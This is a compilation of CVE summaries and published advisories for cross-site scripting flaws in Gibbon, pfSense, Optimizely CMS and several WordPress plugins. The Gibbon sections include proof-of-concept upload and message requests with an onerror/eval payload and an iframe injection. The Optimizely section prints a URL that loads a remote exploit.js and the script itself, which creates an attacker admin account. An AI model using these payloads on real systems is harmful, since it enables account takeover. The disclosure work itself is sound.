**According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?**

The user would have to click on a specially crafted URL to be compromised by the attacker.

CVE-2023-36016: Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

CVE-2023-36410: Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

GibbonEdu Gibbon through version 25.0.0 allows /modules/Planner/resources_addQuick_ajaxProcess.php file upload with resultant XSS. The imageAsLinks parameter must be set to Y to return HTML code. The filename attribute of the bodyfile1 parameter is reflected in the response.

**usd-2023-0024 | Cross-Site Scripting**

**Advisory ID**: usd-2023-0024  
**Product**: Gibbon  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-79  
**Security Risk**: High  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45881

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

A reflected XSS was found in the filename of uploaded files.  
This can lead to the creation of arbitrary high privileged accounts.

**Proof of Concept**

The application allows to upload files without prior authentication using the

/modules/Planner/resources\_addQuick\_ajaxProcess.php

endpoint.

The following request can be used to upload files to the server:

POST /modules/Planner/resources\_addQuick\_ajaxProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="id"

body
------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyaddress"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile1"; filename="../<img src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>.gif"
Content-Type: text/plain

<!DOCTYPE html>
<html><h1>hello</h1>/html>

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile2"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile3"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile4"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="imagesAsLinks"

Y
------WebKitFormBoundaryeSZWbY4RNteSpbi4--

The **imagesAsLinks** parameter must be set to **Y** to return HTML code.  
The _filename_ attribute of the **bodyfile1** parameter is reflected in the response.

The response of the request will look like:

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: G5ad8ffa23a25972f=uauluvtju3kvlave1ushepkvjo; path=/; HttpOnly; SameSite=Lax
\[...\]

&lta target='\_blank' style='font-weight: bold' href='http://localhost:8080/uploads/2023/07/imgsrcXonerrorevalatobYWxlcnQoZG9jdW1lbnQuZG9tYWluKQ\_Go0qk7tKRgW0S9X8.gif'>&ltimg src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>

**Fix**

It is recommended to treat all input on the website as potentially dangerous.

**References**

*   https://cwe.mitre.org/data/definitions/79.html

**Timeline**

*   **2023-07-11**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45881: usd-2023-0024 - usd HeroLab

GibbonEdu Gibbon version 25.0.0 allows HTML Injection via an IFRAME element to the Messager component.

**usd-2023-0019 | HTML Injection**

**Advisory ID**: usd-2023-0019  
**Product**: Gibbon (https://gibbonedu.org/)  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-79  
**Security Risk**: Medium  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45879

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

A user with permissions to send messages can inject an **iframe** into the application.  
This can be used to abuse a XSS/CSRF vulnerability in the admin backend, to create a new admin user.

The message can be send to an existing admin user. When the target opens the message, the (hidden) **iframe** will be embedded into the application.

**Proof of Concept**

To create the message, navigate to the _Home > Messenger > New Message_ site.

Fill the form and select an admin user as reciepent. Intercept the request and change the message body to

<iframe src="http://responsible-disclosure:8989/index.html"></iframe>

POST /modules/Messenger/messenger\_postProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="address"


/modules/Messenger/messenger\_post.php
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="subject"

test
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="body"

<p><iframe src="http://localhost:8989/index.html"></iframe></p>
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
\[...\]
Content-Disposition: form-data; name="individualList\[\]"

0000000001
------WebKitFormBoundaryHs6JkrrxpoUfeRfX--

As shown in the screenshot below, the iframe is injected into the message.  

**Fix**

It is recommended to treat all input on the website as potentially dangerous.

**References**

*   https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/11-Client-side\_Testing/03-Testing\_for\_HTML\_Injection

**Timeline**

*   **2023-06-27**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45879: usd-2023-0019 - usd HeroLab

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted url to the status_logs_filter_dynamic.php page.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_09.webgui Security Advisory pfSense Topic: XSS vulnerability in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42325 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 18:51:06 UTC (pfSense Plus master, 23.09) 2023-07-05 18:51:06 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential Cross-Site Scripting (XSS) vulnerability was found in status\_logs\_filter\_dynamic.php, a component of the pfSense Plus and pfSense CE software GUI. The page does not always validate or sanitize the value of the "interface" variable from user input when using RAW mode ("filtersubmit=1"), which then may be printed without encoding inside a block of JavaScript code. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to the lack of proper encoding on the affected parameters susceptible to XSS, arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised. The user must be logged in and have sufficient privileges to access status\_logs\_filter\_dynamic.php. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master f387c974a9a597bf01ab86ec049cca186a1e050c pfSense/master f387c974a9a597bf01ab86ec049cca186a1e050c - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wRcACgkQE7mH/ZIU +NotvRAAobKxH11HjFKUNdAUA6rqv9BcRqgYWNVTVQSDM/Wmf4lw2mAvldMaaSOc KodEYJ6LWf1kZGu7VN36q59l7gn9/H42PeBNU7cNDJZaNXZd3LUG2bqRn4f8AuJA jUvPzE3w7DHcxrgHIn/3S8WI5WSVDgemzL4d6HlbzJtJ1mdF1viWkJZY6EqKRPgR Mw1adsPZyiAf7AalNRA7IJjPYTyUMxC2YSiMz2goeWd+6Zfkul9sbciTXCQwFAXO ZelZZm+arYtutXpeCJPmX3SvVcaT+f87anql20Xlijkuexr8aoMuSHOX8MYWMapY ndoNZZusoq2pUSK4VAPnhBIqtD6M7izC+bcWUBRea3h3/IiXjhPDtUtr4ONZQ3fQ HGf8ZEHd2EswpNhYbKz5cdMm37Q3JhRzVYMXFvNjsjOliF0ZyEibnO5L7W51Jujk yRu5fIli6UlfhcLD2iTOdnDnxSzxl4QiBAD0/XMVl3OQoy1R4AoFS9VtGi+EteB9 SykmgjmgIBjxSQvEyt30olt9XbVvDbi1EQDmJz6hd14P1Sy03BMn1BZoU5heN9Xc t3gdQMS01rB+EqGenXDnKvIKQ3LAb1AqNvYzn1BSrMno6YGCgSVEKw6vPEbEoI7r AX6MEZeetdwzHIEws9UEp8XYt6Q1hSmnNCJU8pfpAsuaum3SGo0= =W5mP -----END PGP SIGNATURE-----

CVE-2023-42325

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_08.webgui Security Advisory pfSense Topic: XSS vulnerability in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42327 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 17:43:56 UTC (pfSense Plus master, 23.09) 2023-07-05 17:43:56 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential Cross-Site Scripting (XSS) vulnerability was found in getserviceproviders.php, a component of the pfSense Plus and pfSense CE software GUI. The page does not always validate or sanitize the value of the "connection" variable from user input, which then may be displayed without encoding. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to the lack of proper encoding on the affected parameters susceptible to XSS, arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised. The user must be logged in and have sufficient privileges to access getserviceproviders.php. The affected case requires a provider to only have one plan. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master 543dc9253d6ab0e755ee043da2217d996a28ab5e pfSense/master 543dc9253d6ab0e755ee043da2217d996a28ab5e - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wPoACgkQE7mH/ZIU +Nq8KA//YY1io7ZIDo//w4I3v+j25c83Yx40K20I+Zal8cyPflwqG6fF/DJRCEfv R0CWRZP6aPEfxVsWfLhoDktEm6yNcn0WR6MSVTbKOnyfJfb7Dp/tznkzZhSUqQ7v rt0bBMSdoQTn6gZIAD7TLVCmh9RfcYAXDWGiHUNC5d6kvy8Eoe7/+cjZUOSbvg/a EV0EgKqZoWFkwZWWLrbtNKyMBpIA1sgUKeVAPwnFMJ20QRPrafdNJircOU0S0vR5 1zAs6JMKgARL5ytzPxlndtKtwe1sVmxkYeGUb6C7b6mLnPckCFMGaAZYYnrK2V3f YbqK66/ZURgdmGcLAy305/oNwZy3JmpVS2FNgS3ZrBlwYXlYnxFkrEzi4SMFNtVP RltNabwM75bq/9tWqDm/nitHwmEgkm3wKdtXue2TGfNEulsmb+TeH7hGXJzuxStm 0lx+oQDmLL9jToPx4aHWMSXSCJe3wKk4uxpe6TTD9hnOB+TEln4sjmS5/MDlAYP8 zh8vkwKUag3gIPulsnmRFNrIPw49ezoWg4ZdVzadpw7zwS6Iar/oK4xEVIb6abWz kYAmB85iOuvqeZzVbiRNl8bb06h/ci9hXmsInuWwV8BfXtR1bl/xJ2n0j1AXnQPW yn27vmU9UmFodHjNfRATNzNGVL4vZoXDnvaeDMgRBwa5Dobslig= =9dZ6 -----END PGP SIGNATURE-----

CVE-2023-42327

Optimizely CMS UI before v12.16.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Admin panel.

**Description**

The Optimizely admin interface was vulnerable to DOM-based cross-site scripting (XSS), which could allow an attacker to execute malicious Javascript code in a legitimate user's browser. 

Optimizely CMS is a widely used content management system that allows users to create and manage digital content. The CMS was previously called Episerver.

**Impact**

WithSecure weaponized the XSS to automatically create an attacker-controlled admin user in Optimizely as a proof of concept. This could be used in conjunction with, for example, phishing to take control of Optimizely instances.

**Proof of concept**

The Optimizely admin panel utilized JavaScript to fetch and display content. The frontend looked at the content in the URL fragment and attempted to fetch the requested content. If the fetch failed, such as when the content did not exist, a dialogue would be displayed with an error message. The way this error message was displayed to the user left the application vulnerable to XSS. An example error can be viewed in the  screenshot below:

The error message is displayed to the user by setting the innerHTML attribute on an element with the message content. The attacker-controlled input in this message is not sanitized or validated before the assignment. This allows an attacker to control the HTML content of the element. As an example, by visiting the following URL:

http://172.20.0.3/EPiServer/CMS/#context=epi.cms.contentdata:///%3Cimg%20src=x%20onerror=alert(%22xss%22)%3E

An alert popup in the user's browser (provided they are signed in to Optimizely) will be displayed, indicating that it is possible to execute arbitrary JavaScript:

Below is a debugging session where the attacker-controlled input reaches the vulnerable sink in widgets.js:

In the above screenshot, the contents of the variable _**\_5c1**_ is printed in the browser console. The content is an error message meant to be displayed to the user, saying that the requested URL could not be loaded followed by the attacker provided data. 

WithSecure weaponized the XSS to automatically add a new admin user to Optimizely when a link was clicked:

http://172.20.0.3/EPiServer/cms#context=epi.cms.contentdata:///%3Cimg%20src=x%20onerror=%22document.write('%3Cscript%20src=\\'http://192.168.84.168:8000/exploit.js\\'%3E%3C/script%3E')%22%3E

The URL-decoded payload can be viewed below:

<img src=x onerror="document.write('<script src=\\'http://192.168.84.168:8000/exploit.js\\'></script>')">

Since the user provided input reaches an innerHTML sink, regular  <script> tags cannot be used to execute Javascript. Instead, an image tag with an  onerror attribute is used to write a script tag to the DOM. The browser would then load  additional attacker-controlled Javascript from  http://192.168.84.168:8000/exploit.js. In a real-world scenario, this would be a host on the Internet instead of an internal host. The contents of exploit.js:

fetch('http://172.20.0.3/EPiServer/EPiServer.Cms.UI.Admin/default', { 'credentials': 'include' }).then(response => response.text()).then(data => data.match(/value="(.\*)\\"/)\[1\]).then(token => { json={"username":"hacker","email":"hacker@hack.hack","isChangePassword":true,"password":"Password1!","confirmPassword":"Password1!","currentPassword":"","passwordAnswer":"","language":null,"touchSupport":false,"headlessModeEnabled":false,"roles":\["WebAdmins"\],"isApproved":true,"isLockedOut":false};fetch('http://172.20.0.3/EPiServer/EPiServer.Cms.UI.Admin/users/Create',{'credentials':'include','body':JSON.stringify(json),'method':'POST',headers:{'Content-Type':'application/json','RequestVerificationToken':token}})})

The above script adds a user called hacker with a pre-set password as a web admin in Optimizely. An attacker would need to trick a user into clicking a malicious link that triggers the XSS vulnerability, and if the user is signed in to Optimizely, an attacker-controlled admin account would be created. The attacker can subsequently sign in to Optimizely using the account.

CVE-2023-31754: Optimizely CMS Admin Panel DOM XSS

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in ThemePunch OHG Essential Grid plugin <= 3.1.0 versions.

**Solution**

 Fixed

Update the WordPress Essential Grid plugin to the latest available version (at least 3.1.1).

Found this useful? Thank Rafie Muhammad (Patchstack) for reporting this vulnerability. Buy a coffee ☕

Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Essential Grid Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 3.1.1.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47684: WordPress Essential Grid plugin <= 3.1.0 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Qode Interactive Qi Addons For Elementor plugin <= 1.6.3 versions.

**Solution**

 No fix

No patched version is available. No reply from the vendor.

Found this useful? Thank Rafie Muhammad (Patchstack) for reporting this vulnerability. Buy a coffee ☕

Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Qi Addons For Elementor Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 2 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47680: WordPress Qi Addons For Elementor plugin <= 1.6.3 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in edward_plainview Plainview Protect Passwords plugin <= 1.4 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Plainview Protect Passwords Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 2 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#xss